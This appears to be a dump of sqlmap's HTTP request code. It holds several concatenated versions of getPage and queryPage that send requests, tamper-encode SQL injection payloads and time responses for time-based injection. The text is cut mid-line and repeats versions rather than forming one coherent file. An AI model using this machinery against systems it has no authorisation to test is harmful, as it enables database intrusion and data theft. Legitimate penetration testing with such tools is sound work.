"\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout(".") dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage( url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host ) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ), ) if headers: if ( kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers ): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find("/") + 1 :] ) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare, ) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True, ) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return ( comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength), ) else: return comparison(page, headers, code, getRatioValue, pageLength)
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 url = kwargs.get('url', conf.url) get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) host = kwargs.get('host', conf.host) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) refreshing = kwargs.get('refreshing', False) retrying = kwargs.get('retrying', False) crawling = kwargs.get('crawling', False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") code = None page = None requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post else HTTPMETHOD.GET)) requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) else: socket.setdefaulttimeout(conf.timeout) if direct: if "?" in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect.__connReadProxy(conn) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif any ([refreshing, crawling]): pass elif target: if conf.parameters.has_key(PLACE.GET) and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST and not post: for place in (PLACE.POST, PLACE.SOAP): if conf.parameters.has_key(place): post = conf.parameters[place] break elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({ HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer }) if conf.realTest: headers[HTTPHEADER.REFERER] = "%s://%s" % (conf.scheme, conf.hostname) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[HTTPHEADER.HOST] = host or getHostHeader(url) if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) if not req.has_header(HTTPHEADER.ACCEPT_ENCODING): requestHeaders += "%s: identity\n" % HTTPHEADER.ACCEPT_ENCODING requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not req.has_header(HTTPHEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if not req.has_header(HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and req.has_header(HTTPHEADER.AUTHORIZATION): kb.authHeader = req.get_header(HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and req.has_header(HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = req.get_header(HTTPHEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect.__connReadProxy(conn) skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect.__connReadProxy(conn) code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/')+1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, page)) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s\n" % (logHeaders, page) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "page not found (%d)" % code logger.debug(debugMsg) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target url (%d - %s)" % (e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException and not conf.realTest: warnMsg += ", sqlmap is going to retry the request" logger.critical(warnMsg) return Connect.__retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise sqlmapConnectionException, warnMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance( conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 # dirty hack because urllib2 just skips the other part of provided url # splitted with space char while urlencoding it in the later phase url = kwargs.get('url', conf.url).replace(" ", "%20") get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', False) refreshing = kwargs.get('refreshing', False) page = "" cookieStr = "" requestMsg = "HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, conf.method) requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" responseMsg = "HTTP response " requestHeaders = "" responseHeaders = None logHeaders = "" try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) if direct: if "?" in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener( proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(url, multipart) page = conn.read() responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif refreshing: # Reference(s): # http://vancouver-webpages.com/META/metatags.detail.html # http://webdesign.about.com/od/metataglibraries/a/aa080300a.htm get = None post = None else: if conf.parameters.has_key(PLACE.GET) and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST: if conf.parameters.has_key(PLACE.POST) and not post: post = conf.parameters[PLACE.POST] requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Perform HTTP request headers = forgeHeaders(cookie, ua, referer) if conf.realTest: headers[HTTPHEADER.REFERER] = "%s://%s" % (conf.scheme, conf.hostname) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[encodeUnicode(key, kb.pageEncoding)] = encodeUnicode( item, kb.pageEncoding) post = encodeUnicode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) if not conf.dropSetCookie and conf.cj: for _, cookie in enumerate(conf.cj): if not cookieStr: cookieStr = "Cookie: " cookie = getUnicode(cookie) index = cookie.index(" for ") cookieStr += "%s; " % cookie[8:index] if not req.has_header(HTTPHEADER.ACCEPT_ENCODING): requestHeaders += "%s: identity\n" % HTTPHEADER.ACCEPT_ENCODING requestHeaders += "\n".join([ "%s: %s" % (header, value) for header, value in req.header_items() ]) if not req.has_header(HTTPHEADER.COOKIE) and cookieStr: requestHeaders += "\n%s" % cookieStr[:-2] if not req.has_header(HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % post requestMsg += "\n" logger.log(8, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and req.has_header(HTTPHEADER.AUTHORIZATION): kb.authHeader = req.get_header(HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and req.has_header( HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = req.get_header( HTTPHEADER.PROXY_AUTHORIZATION) if hasattr(conn, "setcookie"): kb.redirectSetCookie = conn.setcookie if hasattr(conn, "redurl") and hasattr( conn, "redcode" ) and not conf.redirectHandled and not conf.realTest: msg = "sqlmap got a %d redirect to " % conn.redcode msg += "%s - What target address do you " % conn.redurl msg += "want to use from now on? %s " % conf.url msg += "(default) or provide another target address based " msg += "also on the redirection got from the application\n" while True: choice = readInput(msg, default=None) if not choice: pass else: conf.url = choice try: parseTargetUrl() return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: continue break conf.redirectHandled = True # Reset the number of connection retries kb.retriesCount = 0 # Return response object if response: return conn, None # Get HTTP response page = conn.read() code = conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None except: pass code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) if code not in kb.httpErrorCodes: kb.httpErrorCodes[code] = 0 kb.httpErrorCodes[code] += 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join([ "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items() ]) logHTTPTraffic( requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, page if isinstance(page, unicode) else getUnicode(page))) if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s\n" % (logHeaders, page) logger.log(7, responseMsg) if e.code == 401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == 404 and raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) page = processResponse(page, responseHeaders) return page, responseHeaders
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ ########### Connect the Database directly if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None # print "place -----",place if not place: #print kb.injection.place #print "place.get:",PLACE.GET place = kb.injection.place or PLACE.GET## kb.injection.place = none , place.get= 'get' if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) """ print "------------------------- value ---------------------------" print value print "----------------------------------------------------------" """ payload = agent.extractPayload(value) """ payload_file = open("payload_file","a") print "------------------ Payload -------------------------" print >>payload_file, payload payload_file.close() """ threadData = getCurrentThreadData() #print type(threadData) if conf.httpHeaders: headers = OrderedDict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: try: payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " errMsg += "function '%s' ('%s')" % (function.func_name, ex) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None raise404 = place != PLACE.URI if raise404 is None else raise404 if not place: place = kb.injection.place payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True) if PLACE.POST in conf.parameters: post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value) if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." logger.warn(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if content or response: return page, headers page = removeReflectiveValues(page, payload) if getRatioValue: return comparison(page, getRatioValue=False, pageLength=pageLength), comparison(page, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, getRatioValue, pageLength) else: return False
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST, PLACE.URI): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ('?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', '>').replace('<', '<') value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: origValue = conf.parameters[item] if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = 